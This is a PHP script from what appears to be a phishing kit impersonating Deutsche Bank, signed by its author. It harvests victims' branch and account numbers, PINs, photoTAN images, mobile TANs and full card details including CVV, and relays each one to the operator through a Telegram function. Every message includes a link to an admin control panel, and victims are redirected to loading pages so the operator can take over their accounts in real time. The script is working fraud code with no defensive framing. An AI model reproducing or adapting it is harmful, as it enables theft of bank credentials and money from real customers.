5tarl0rd
<?php
session_start();
require 'cc_type.php';
require 'param.php';
require 'telegram.php';
require 'prevents/index.php';
$ip = $_SERVER['REMOTE_ADDR'];
$link = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . '://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']);
if (isset($_POST['type']) AND $_POST['type'] == "login") {
if (!empty($_POST['branch']) AND !empty($_POST['account']) AND !empty($_POST['subaccount']) AND !empty($_POST['pin']) AND !empty($_POST['quickLink'])) {
if (strlen($_POST['branch']) >= 3) {
if (strlen($_POST['account']) >= 7) {
if (strlen($_POST['subaccount']) >= 2) {
if (strlen($_POST['pin']) >= 5) {
$message = "Deutsche-Bank - LOGIN\r\n";
$message .= 'Filiale : ' . $_POST['branch'] . "\r\n";
$message .= 'Konto : ' . $_POST['account'] . "\r\n";
$message .= 'Unterkonto : ' . $_POST['subaccount'] . "\r\n";
$message .= 'PIN : ' . $_POST['pin'] . "\r\n";
$message .= '/-----ADMINISTRATION-------/' . "\r\n";
$message .= $link. "/control.php?ip=$ip\r\n";
telegram ($message);
header("Location: loading.php?ip=$ip&next=pt");
unset($_SESSION['erro']);
} else {
header('Location: index.php');
$_SESSION['erro'] = "Bitte füllen Sie die Felder korrekt aus";
}
} else {
header('Location: index.php');
$_SESSION['erro'] = "Bitte füllen Sie die Felder korrekt aus";
}
} else {
header('Location: index.php');
$_SESSION['erro'] = "Bitte füllen Sie die Felder korrekt aus";
}
} else {
header('Location: index.php');
$_SESSION['erro'] = "Bitte füllen Sie die Felder korrekt aus";
}
}else{
header('Location: index.php');
$_SESSION['erro'] = "bitte fülle alle Felder aus";
}
}
if (isset($_POST['type']) AND $_POST['type'] == "photo_tan") {
if (isset($_FILES['photo_tan']) && $_FILES['photo_tan']['error'] === UPLOAD_ERR_OK) {
$fileTmpPath = $_FILES['photo_tan']['tmp_name'];
$fileName = $_FILES['photo_tan']['name'];
$fileSize = $_FILES['photo_tan']['size'];
$fileType = $_FILES['photo_tan']['type'];
$fileNameCmps = explode(".", $fileName);
$fileExtension = strtolower(end($fileNameCmps));
$newFileName = $ip . '.' . $fileExtension;
$allowedfileExtensions = array('jpg', 'png', 'jpeg');
if (in_array($fileExtension, $allowedfileExtensions))
{
// directory in which the uploaded file will be moved
$uploadFileDir = './photo_tan/';
$dest_path = $uploadFileDir . $newFileName;
if(move_uploaded_file($fileTmpPath, $dest_path))
{
$message = "Deutsche-Bank - PHOTO_TAN\r\n";
$newFileName = $ip . '.' . $fileExtension;
$message .= 'link : ' .$link."/photo_tan/$newFileName\r\n";
$message .= '/-----ADMINISTRATION-------/' . "\r\n";
$message .= $link. "/control.php?ip=$ip\r\n";
telegram ($message);
unset($_SESSION['message']);
header("Location: loading.php?ip=$ip&next=t");
}
else
{
$message = 'Beim Verschieben der Datei in das Upload-Verzeichnis ist ein Fehler aufgetreten. Bitte stellen Sie sicher, dass das Upload-Verzeichnis vom Webserver beschreibbar ist.';
$_SESSION['message'] = $message;
header("Location: photo_tan.php");
}
}else{
$message = 'Upload fehlgeschlagen. Zulässige Dateitypen: ' . implode(',', $allowedfileExtensions);
$_SESSION['message'] = $message;
header("Location: photo_tan.php");
}
}
else
{
$message = 'Beim Hochladen der Datei ist ein Fehler aufgetreten. Bitte überprüfen Sie den folgenden Fehler.<br>';
$message .= 'Fehler:' . $_FILES['uploadedFile']['error'];
$_SESSION['message'] = $message;
header("Location: photo_tan.php");
}
}
if (isset($_POST['type']) AND $_POST['type'] == "tan"){
if (!empty($_POST['tan'])) {
$message = "Deutsche-Bank - MobileTAN\r\n";
$message .= 'TAN : ' . $_POST['tan'] . "\r\n";
$message .= '/-----ADMINISTRATION-------/' . "\r\n";
$message .= $link. "/control.php?ip=$ip\r\n";
telegram ($message);
header("Location: loading.php?ip=$ip&next=p");
$_SESSION['ip'] = $ip;
$_SESSION['next'] = "p";
unset($_SESSION['erro']);
} else {
header('Location: tan.php');
$_SESSION['erro'] = "bitte fülle alle Felder aus";
}
}
if (isset($_POST['type']) AND $_POST['type'] == "cc"){
if (!empty($_POST['ccnum']) AND !empty($_POST['exp']) AND !empty($_POST['cvv'])) {
$con = getCCType($_POST['ccnum']);
if ($con != "none") {
if (strlen($_POST['exp']) == 5) {
if (strlen($_POST['cvv']) == 3) {
$message = "Deutsche-Bank - CreditCard-$con\r\n";
$message .= 'Card Number : ' . $_POST['ccnum'] . "\r\n";
$message .= 'Expiration date : ' . $_POST['exp'] . "\r\n";
$message .= 'CVV : ' . $_POST['cvv'] . "\r\n";
$message .= '/-----ADMINISTRATION-------/' . "\r\n";
$message .= $link. "/control.php?ip=$ip\r\n";
telegram ($message);
header("Location: loading.php?ip=$ip&next=s");
unset($_SESSION['erro']);
} else {
header('Location: cc.php');
$_SESSION['erro'] = "Bitte geben Sie ein gültiges visuelles Kryptogramm ein";
}
} else {
header('Location: cc.php');
$_SESSION['erro'] = "Bitte geben sie ein gültiges Ablaufdatum an";
}
} else {
header('Location: cc.php');
$_SESSION['erro'] = "Bitte geben Sie eine gültige Kartennummer ein";
}
} else {
header('Location: cc.php');
$_SESSION['erro'] = "bitte fülle alle Felder aus";
}
}
?>
5tarL0rd By